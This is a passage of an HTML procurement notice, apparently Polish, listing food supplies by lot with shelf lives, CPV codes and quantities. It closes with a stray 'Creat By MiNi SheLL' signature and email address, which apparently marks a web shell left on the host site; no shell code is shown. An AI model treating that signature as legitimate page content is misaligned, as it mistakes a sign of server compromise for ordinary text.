(opakowanie zbiorcze 3.90 kg)
  Termin przydatności do spożycia 90 dni	15871000-4	  140 op.
55.	Zaprawa cytrynowa /a1L/szt./
(opakowanie zbiorcze 6 L/szt.)
  Termin przydatności do spożycia 18 miesięcy	15871200-6	   30 op.
56.	Sól jodowana /a 1 kg/
(opakowanie zbiorcze 25 kg)
  Termin przydatności do spożycia 18 miesięcy	15872400-5	   70 op.
57.	Cynamon /a 0.015kg/
(opakowanie zbiorcze 0.375 kg)
Termin przydatności do spożycia 18 miesięcy	15872000-1	     8 op.
58.	Majonez delikatesowy /a 0.4 kg/ 
(opakowanie zbiorcze 2.40kg)
Termin przydatności do spożycia 30 dni	15871273-8	   70 op.
59.	Kisiel owocowy /a0.04kg/
(opakowanie zbiorcze   1.2 kg)
Termin przydatności do spożycia 6 miesięcy	15800000-6	  26 op.
60.	Cukier waniliowy /a 0.032/
Opakowanie zbiorcze  0.8 kg 
Termin przydatności do spożycia 6 miesięcy	15830000-5	8 op.
61.	Mleko w proszku - zawartość tłuszczu 26% /a0.4 kg/
(opakowanie zbiorcze 4 kg)
Termin przydatności do spożycia 6 miesięcy	15511700-0	8 op.
62.	Śliwka suszona/ a0.20 kg/ opakowanie zbiorcze 1.20 kg termin przydatności do spożycia 12 miesięcy
	15332410-1	  5op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ryba wędzona Makrela luz
(opakowanie zbiorcze 3 kg)
Termin przydatności do spożycia 7 dni	15234000-7	40 op.
2.	Śledź w zalewie octowej a la Matias
(opakowanie zbiorcze 4 kg)
Termin przydatności do spożycia 21 dni	03311300-5	30 op.
3.	Konserwa rybna - śledź w sosie pomidorowym  a0.17 kg-szt.
(opakowanie zbiorcze 4.08 kg 24 szt.)
. Termin przydatności do spożycia 24 miesiące    	15241200-1	25 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.23.40.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 	Mieszanka kompotowa /a 2.5 kg/
luz
termin przydatności do spożycia 12 miesięcy	15331170-9	700 op.
2.	Szpinak mrożony - mielony /a 2, 5 kg/ luz termin przydatności do spożycia 12 miesięcy	15331170-9	700 op.
3.	Filet mrożony - MINTAJ 25% glazury /a 5 kg/ luz
termin przydatności do spożycia 12 miesięcy	03310000-5	  400 op.
4.	Kalafior mrożony /a 2.50 kg / luz
termin przydatności do spożycia 12 miesięcy	03221420-6	100 op.
5.
	Brokuł mrożony /a 2.5 kg/ luz
termin przydatności do spożycia 12 miesięcy 	03221430-9	180op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> WODA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naturalna woda niegazowana 
BUTLA 19 L	15981000-8	200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> WODA II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Naturalna woda mineralna gazowana PET 0.5 L (opakowanie zbiorcze 6 L)	15981000-8	30 op.
2.	Naturalna woda mineralna niegazowana PET 0.5 L (opakowanie zbiorcze 6L)	15981000-8	30 op.
3.	Naturalna woda mineralna gazowana PET 1.5 L (opakowanie zbiorcze 9 L)	15981000-8	3 500 op.
4.	Naturalna woda mineralna niegazowana PET 1.5 L (opakowanie zbiorcze 9 L)	15981000-8	500 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> OWOCE CYTRUSOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Pomarańcza / waga 1 szt. =około 250g/, (opakowanie zbiorcze 5 - 10 kg)	03222220-1	760 kg
2.	Grapefruit /waga 1 szt. = około 400g/, (opakowanie zbiorcze 9 - 18 kg) 	03222230-4	600 kg
3.	Mandarynka / waga 1 szt. = około 150g/, (opakowanie zbiorcze 4.5 - 12 kg)		75 kg
4.	Cytryna (opakowanie zbiorcze 1 - 5 kg)	03222210-8	110 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.22.20-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com